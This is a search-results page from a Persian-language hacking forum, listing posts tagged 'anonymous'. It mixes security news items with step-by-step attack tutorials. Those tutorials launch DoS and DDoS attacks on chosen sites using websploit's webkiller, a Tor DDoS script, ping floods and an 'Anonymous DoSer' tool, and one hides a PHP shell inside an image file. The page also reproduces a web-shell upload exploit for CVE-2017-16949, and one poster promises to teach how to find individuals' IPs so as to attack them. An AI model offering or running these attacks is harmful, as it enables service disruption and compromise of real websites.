امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'anonymous'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

14 نتیجه پیدا شد

  1. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  2. Black_petya

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  3. Black_petya

    Windows

    میخواهید سایتی را هک کنید و شل خود را روی ان سایت فراخوانی کنید یکی از راحت ترین روش های چسبناندن شل به عکس هست کافیه در cmd از دستور زیر استفاده کنید copy /b shell.php + photo.jpg sobhaneh.rar با دستور بالا میتوانید شل را به عکس بچسبانید نکته ( باید هر دوتا فایل را به یک فولدر ریخته و با دستور cd به دایرکتوری رفته و بعد اقدام به این کار بکنید) با اپلود شدن عکس در وب یک بار ادرس عکس را باز کنید بعد شل اتوماتیک روی سایت جایش را میگیرد. امید وارم خوشتان بیایید میتوانید با این روش ویروس را هم به عکس بچسپانید
  4. با سلام ابتدا لینوکس برپایه دبیان خود را اجرا کرده و دستور زیرا در داخل بنویسی sudo apt-get install figlet با دستور بالا figlet نصب و راه اندازی میشود برای نوشتن متن های زیبا کافیست دستور figlet youttext را بنویسید شما به جای ( youttext) متن خود را بنویسید . با تشکر
  5. Black_petya

    Globaly Labrary

    کتابی در مورد کار با یونیکس و راه اندازی ان امید وارم خوشتان امده باشد . لینک کتاب
  6. از زمان ظهور اسپیکرهای هوشمند مانند آمازون اکو، امنیت کاربران هم تا حدودی مورد تهدید غیرمستقیم این اسپیکرها قرار گرفته است. اما خطرات و تهدیدات این اسپیکرها همراه در حد تئوری بوده و هیچگاه مدرکی برای اثبات خطرات این اسپیکرها ارائه نشده است. با این حال ظاهرا یک گروه هکر چینی موفق به انجام این کار شده‌اند. این گروه از هکرها چند ماه را صرف توسعه تکنیک‌های به‌خصوصی برای نفوذ به دستیار صوتی آمازون کرده‌ و ظاهرا بالاخره موفق به انجام این کار هم شده‌اند. شاید این دستاورد هکرها به‌معنی کنترل کامل اسپیکر هوشمند آمازون از راه دور نباشد، اما در حال حاضر بهترین مثال موجود برای اثبات نحوه تبدیل شدن اسپیکرهای هوشمند به ابزار جاسوسی در منازل کاربران محسوب می‌وشد. در جریان کنفرانس امنیتی «DefCon»، دو محقق با نام‌های «وو هیو» و «ژیانگ ون» روشی را در معرض نمایش گذاشتند که با جمع‌آوری یک سری از باگ‌های موجود در نسل دوم اسپیکرهای آمازون اکو، کنترل این اسپیکر را در دست می‌گرفتند و اسپیکر صداهای اطراف را ضبط کرده و مستقیما برای هکر ارسال می‌کرد. این اتفاق در حالی رخ می‌دهد که کاربر هیچ اطلاعی از هک شدن دستگاهش ندارد. البته جای نگرانی وجود ندارد چراکه هکرها این باگ‌ها را با شرکت آمازون در میان گذاشته و این شرکت هم جولای امسال آپدیت‌های لازم برای رفع این باگ‌ها را منتشر کرد. علاوه بر این، هک شدن اسپیکر به همین راحتی‌ها هم نبود چراکه هکر برای نفوذ به اسپیکر هوشمند ابتدا بایستی مستقیما به شبکه وای‌فای کاربر متصل می‌شد. اما در کل این نتایج نشان می‌داد که امکان نفوذ به اسپیکرهای هوشمند به هر صورت وجود دارد و اینکه در صورت غفلت این اسپیکرها می‌توانند حریم خصوصی کاربران را به خطر بیاندازند.
  7. Moeein Seven

    News

    پیش بینی تهدیدات سایبری پیش روی از سوی موسسات و شرکت های فعال حوزه امنیت سایبری در سال های اخیر به یکی از هنجار های این عرصه بدل شده است. قطعا با این ترفند نمی توان همه تهدیدات و خطرات موجود را شناسایی کرد؛ اما همین امر سبب به حداقل رسیدن حملات سایبری و چالش های فضای مجازی در مقیاس جهانی می شود. به عنوان مثال؛ در سال گذشته میلادی، پژوهش ها در این زمینه از احتمال افزایش حملات علیه موسسات تجاری و شرکت های بزرگ فراملی حکایت داشت. همین امر، با وجود به بار آمدن میلیون ها دلار هزینه در مقیاس جهانی، سبب آمادگی نسبی جهان در کنترل و مواجهه با بحران هایی مثل واناکرای (WannaCry) و نات پتیا (NotPetya) شد. هکرها به صورت مداوم، در حال پیدا کردن اهداف و ابزار جدید هستند. این امر شناخت و پیشگیری از وقوع نفوذ سایبری را به امری دشوار بدل کرده است. بر اساس پژوهش های صورت گرفته از سوی کارشناسان ارشد امنیت سایبری جهان؛ جامعه بین الملل باید در سال پیش روی، منتظر بروز چالش های امنیتی تازه در زیرساخت های حیاتی و فضای مجازی باشد. بی شک برجسته شدن گونه ای خاص از حملات سایبری در سطح جهان، فضای مجازی ایران را نیز، تحت تاثیر قرار خواهد داد. از همین روی، می توان تهدیدات سایبری شاخص ایران در سال جاری را با استفاده از مطالعات تطبیقی، شناسایی و متوقف کرد. • نفوذ سایبری و سرقت ابر داده ها بر اساس گزارش های منتشر شده از سوی موسسات امنیتی، گزارش حمله سایبری به شرکت اعتباری اکوییفاکس (Equifax) در سال 2017 منجر به سرقت شماره های امنیت اجتماعی، تاریخ تولد و سایر اطلاعات در تقریبا نیمی از جمعیت ایالات متحده شد. این امر، مبین کلان شدن تدریجی اهداف مهاجمان سایبری دولتی و مستقل شده است. بنابراین، افزایش حملات سایبری به بایگانی شرکت های بزرگ و بانک های اطلاعات کلان، در سال 2018، امری بسیار محتمل است. مارک گودمن، کارشناس امنیت و نویسنده کتاب جرائم آینده، بر این باور است که موسسات کارگزار اطلاعاتی با دسترسی آزاد به طیف وسیعی از داده های کلیدی مختلف، در سال میلادی جاری، از اهداف شاخص و برجسته هکر ها خواهند بود. اتفاقات اخیر و سرقت گسترده اطلاعات در سطح جهان، می تواند برای برخی بخش های ایران، از جمله سامانه های ثبت احوال و زیرساخت های بانکی این کشور، نوعی هشدار به شمار رود. به عقیده بسیاری از کارشناسان، سال 2018، سال سرقت اطلاعات در بستر فضای مجازی، خواهد بود. از سوی دیگر، رشد سریع و شتابان فضای ابری نیز، بدون محیا شدن زیرساخت های امنیتی حیاتی برای ورود به این عرصه در ایران، از خطرات بالقوه در آینده ای نزدیک، محسوب می شود. • حملات سایبری با تبعات فیزیکی با بررسی روند رشد حملات سایبری به زیرساخت های حیاتی، می توان نتیجه گرفت که جهان باید در سال 2018 خود را برای مقابله با حجم بالایی از این دست حملات، آماده کند. برخی از این تهاجم ها، مثل حمله به شبکه برق اوکراین در سال 2014 از سوی روسیه، با هدف ایجاد اختلال فوری، ترتیب داده می شوند. در حالی که انواع دیگر این دست حملات، نفوذ اطلاعاتی و باج افزاری را نیز شامل می شوند. به طور کلی می توان افزایش حملات به بخش های زیر را در سال 2018، بسیار محتمل دانست: • صنایع شیمیایی • بخش خدمات تجاری • بخش ارتباطات • بخش‌های تولیدی شاخص • بخش سدها • بخش صنایع دفاعی • بخش خدمات اضطراری • بخش انرژی • بخش خدمات مالی • صنایع غذایی و کشاورزی • بخش خدمات دولتی • بخش بهداشت و درمان عمومی • بخش فناوری اطلاعات • زیرساخت‌های انرژی هسته‌ای و دفع پسماندهای اتمی • سیستم حمل‌ونقل • بخش آب و فاضلاب به عقیده بسیاری از کارشناسان امنیتی، در مقطع فعلی، سامانه های هواپیمایی، قطار ها و دیگر بخش های حمل و نقل، در میان همه انواع زیرساخت های حیاتی، آسیب پذیرترین سامانه های سایبری را در اختیار دارند...
  8. Moeein Seven

    News

    بیست و یکمین کنفرانس بلک هت 2018 (Black Hat 2018)، برگزار شد. این کنفرانس از 4 الی 9 اوت، در شهر لاس ‌وگاس آمریکا در جریان بوده است. در این کنفرانس به موضوعات مهمی از جمله حمله به سخت‌افزار ها، پویش ‌های عملیات اطلاعات، تهدید به حملات سایبری و... به بحث و گفتگو گذاشته‌ شده است. در جریان برگزاری این اجلاس سالن های مختلفی وجود داشت، از جمله شرکت اینفوسک (InfoSec) در قسمت تجاری این کنفرانس 17 هزار نفر از کارشنان خود را آورده بود. همچنین طیف وسیعی از محصولات امنیتی توسط تولید کنندگان آنها ارائه شده است. بهترین آموزش امنیت سایبری در کنفرانس این کنفرانس بیش از 20 سال است که برگزار می شود و در این دوره از آن کارشناسان اقدام به برگزاری نشست های آموزشی کرده اند. در این آموزش ها مسائلی مانند تست نفوذ همچنین آموزش برخی ماژول های منحصر به فرد با هدف شکل دادن به چشم انداز امنیت اطلاعات برای عموم انجام گرفت. حملات سخت افزاری به ویژه در حوزه اینترنت اشیا این موضوع توسط دو تن از کار شناسان به نام های «Josh Datko» و «Joe Fitzpatrick» مورد بحث و گفتگو قرار گرفت. تبیین مسائل مربوط به حوزه حملات سایبری به سخت افزارها دو روز به طول انجامید و تلاش شده است این موارد توسط توسعه دهندگان آنها بررسی و آموزش داده شود. این دوره ها نیز با هدف امنیت برای محققان و علاقه مندان طراحی شده است که تمایل دارند به بینش عمیق تری نسبت به نحوه کارکرد آنها پیدا کنند.
  9. به گزارش ایران اکونومیست، دوهکر مشهور خودروهای خودران، قصد دارند برای متوقف کردن روند هک شدن این نوع خودروها توسط دیگر هکرها وارد عمل شوند. هکرهای یادشده توسط شرکت جنرال موتورز استخدام شده اند و بر اساس اطلاعات منتشر شده در کنفرانس امنیتی بلاک هت امریکا ارتقای توانمندی های امنیتی خودروهای خودران را در دستور کار خود قرار داده اند. این دو هکر چارلی میلر و کریس والاسک نام دارند که هر دو در یکی از زیرمجموعه های جنرال موتورز به نام کروز اتومیشن مشغول به کار شده اند و امیدوارند بتوانند استانداردهای امنیتی جدیدی را به خودروهای خودران اضافه کنند. جنرال موتورز مانند بسیاری از دیگر شرکت های خودروسازی مشهور جهان سرمایه گذاری قابل توجهی را برای تولید و طراحی خودروهای خودران و بدون نیاز به راننده به عمل اورده است. از جمله بخش های خودروهای خودران که قرار است بر امنیت آنها افزوده شود، می توان به دوربین های آنها، حسگرهای شناسایی موانع لیدار، برخی پردازشگرهای سخت افزاری و غیره اشاره کرد. هکرهای یادشده به علت نفوذ به سیستم کنترل خودکار یک خودروی جیپ خودران و برنامه ریزی مجدد آن شهرت دارند. آنها این کار را در سال 2015 و از طریق اینترنت انجام دادند و توانستند سرعت خودروی یادشده را کم و زیاد کنند.
  10. فناوری اطلاعات > اینترنت - در عصر اینترنت فکس یک فناوری قدیمی محسوب می‌شود اما برای هکرهایی که دنبال کشف اسرار از کمپانی‌های هستند، یک معدن طلا محسوب می‌شود. به گزارش خبرآنلاین، محققان چک پوینت می‌گویند ماشین‌های فکس که هنوز در بسیاری از ادارات وجود دارد، دچار نقص امنیتی جدی هستند. این آسیب‌پذیری به هکرها اجازه سرقت فایل‌های حساس را از طریق فکس به شبکه‌های بزرگ ادارات می‌دهد.{لینک} این محققان به‌طور مبسوط راه نفوذ به شبکه‌های رایانه‌ای از طریق پرینترهای اچ پی را به نمایش گذاشتند. فکس‌های مستقل کمتر بوده و امروز بخشی از سیستم‌های موسوم به all-in-one هستند. فایل حاوی کد مخرب به‌صورت عکس به فکس ارسال می‌شود. این فایل در مموری پرینتر ذخیره‌شده و رمزگشایی می‌شود و سپس از طریق این فایل‌ها نفوذ به شبکه رایانه‌ای اداره آغاز می‌شود. امروزه با هوش مصنوعی با تهدیدات اینترنتی مبارزه می‌شود و تمرکز برای امن کردن شبکه پیچیده شده است اما رهاکردن دستگاه فکس خطرآفرین است. گزارش‌شده است که بیش از 46 میلیون ماشین فکس فعال وجود دارد که 17 میلیون آن در آمریکا است و کمپانی‌ها برای امن کردن شبکه‌های خود باید دیتای حساس خود و فکس‌ها را از هم جدا کنند.
  11. Moeein Seven

    Graphics

    باسلام در این تاپیک عکس های هکری و برنامه نویسی برای پروفایل و کاور شما به اشتراک گزاشته میشود از نوشتن ادرس (کانال , سایت ,...) در عکس خودداری کنید اسپم و پرسش و پاسخ ممنوع موفق باشید
  12. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: colette@defiant.com # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  13. hessamlp

    Hacking-Ddos

    سلام! با اموزش (اتک دیداس) در خدمت شما هستیم. اگه دوست دارید این موضوع را یاد بگیرید حتما این پست را دنبال کنید 1.روش اول(با استفاده از cmd) برای اینکار ابتدا از دستور زیر در cmd استفاده میکنیم. ping www.###.com به جای # ادرس سایتی که قصد حمله به ان را دارید بنویسید برای مثال: ping www.anonymouse.com با این دستور(ip)سایت مورد نظر به شما داده میشود. وقتی (ip) را گرفتید از دستور زیر استفاده کنید ping ##.##.## -t -l 1500 به جای # (ip) را وارد کنید و بعد از 1 تعداد پاکت ارسالی را مشخص کنید بیشترین مقدار ممکن پاکت 65500 تا است(به نظر من از 1500 استفاده کنید زیرا امکان از بین رفتن مودم در بالا تر از این مقدار ممکن است) 2.روش دوم(با استفاده ازanonymous_dose) در این روش باید از برنامه anonymous_dose استفاده کنید که براتون اپلود کردم و لینکشو میزارم: Anonymous DoSer ابتدا ip سایت و یا فرد مورد نظر را نیاز داریم که میتوانید به همان روش پست بالا ip سایت را بدست بیاورید و سپس مراحل زیر را انجام دهید: برنامه را باز کنید بعد از باز کردن برنامه پیام زیر را مشاهده میکنید: [Website [URL/I : در جلوی این پیام شما بایدip مورد نظر را وارد کنید بعد از وارد کردن ip اینتر کرده و با پیام زیر رو به رو میشوید: [Time [SECONDS که از شما زمان را بر حسب ثانیه میخوتهد پیشنهاد من اینه که از 100 استفاده کنید و اینتر را بزنید بعد از زدن اینتر اتک شروع میشود و هر وقت نوشته های سبز قرمز شد به معنی خاموش شدن سرور مورد نظر است. امیدوارم از این پست راضی بوده باشید like فراموش نشه (در اموزش بعدی روش های مختلف گرفتن ip افراد را میزارم که بنوانبد به ان ها نیز اتک بدید)
  14. Anonymous که گروهی از هکرها با اهداف مثبت هستند، به‌تازگی به یکی از سرویس‌های هاستینگ وب‌سایت‌های مجرمانه یا دارک وب حمله کرده‌اند. هکرهای وابسته به گروه آنونیموس، جمعه‌ی گذشته بخش بزرگی از دارک وب یا شبکه‌ی وب‌سایت‌های مجرمانه را از کار انداختند. در خلال این حمله، بازدیدکنندگان بیش از ۱۰ هزار وب‌سایت مجرمانه یا Tor-based با یک پیغام از طرف هکرها روبرو شدند. این وب‌سایت‌ها توسط سرویس هاستینگ Freedom Hosting II پشتیبانی می‌شدند و در زمان هک پیغامی مبنی بر هک شدن این سرویس برای بازدیدکنندگان به نمایش گذاشته شد. هکرها عنوان کرده‌اند که نیمی از اطلاعات به سرقت رفته در این نفوذ، تصاویر مستهجن کودک‌آزاری بوده‌اند. البته این ادعاها تاکنون تأیید نشده‌اند. خبر دیگر این‌ که این هکرها حاضر شده‌اند اطلاعات جمع‌آوری شده را به قیمت ۰.۱ بیت کوین یا حدود ۱۰۰ دلار به سرویس هاستینگ بفروشند. این خبر نیز تاکنون تأیید نشده است. وب‌سایت Motherboard چند روز پیش با هکری که ادعا می‌کرد این حمله را برنامه‌ریزی کرده است، مصاحبه‌ای انجام داد. او در این مصاحبه اعلام کرد که این حمله، اولین حمله‌ی هکری او بوده که تنها با داشتن ایده‌ی درست نفوذ انجام شده است. این هکر اعلام کرده که در تاریخ ۳۰ ژانویه به سرویس‌ها دسترسی پیدا کرده است و تنها قصد داشته نگاهی به سرویس و اطلاعات آن داشته باشد. پس از آن، او تعدادی وب‌سایت‌های هرزه‌نگار را که در حدود ۳۰ گیگابایت اطلاعات در آن‌ها ذخیره شده بودند، کشف می‌کند. از آنجایی که سرویس Freedom Hosting II تنها ۲۵۶ مگابایت فضا در اختیار وب‌سایت‌ها قرار می‌دهد، مشخص شد این وب‌سایت‌های مجرمانه برای ذخیره‌ی اطلاعات خود هزینه پرداخت کرده‌اند و ادمین هاستینگ از این وب‌سایت‌ها اطلاع داشته است. در آن زمان، هکر تصمیم می‌گیرد اطلاعات و وب‌سایت‌ها را مورد حمله‌ی جدی قرار دهد. این حمله، دومین حمله از طرف Anonymous به فریدام هاستینگ است. این گروه در سال ۲۰۱۱ نیز وب‌سایت اصلی و اولیه‌ی این سرویس را به‌طور کلی از کار انداختند. آن سرویس نیز میزبان بیش از ۴۰ وب‌سایت هرزه‌نگاری کودک‌آزاری بود. پس از آن، مقامات قضایی نیز مدیران این سرویس را در سال ۲۰۱۳ محکوم کردند و تحت تعقیب قرار دادند. گزارشات نشان می‌دهد سرویس Freedom Hosting II نیز مانند سرویس قبلی به اقدامات مجرمانه مشغول است و پشتیبانی حدود ۲۰ درصد از Dark web را بر عهده دارد.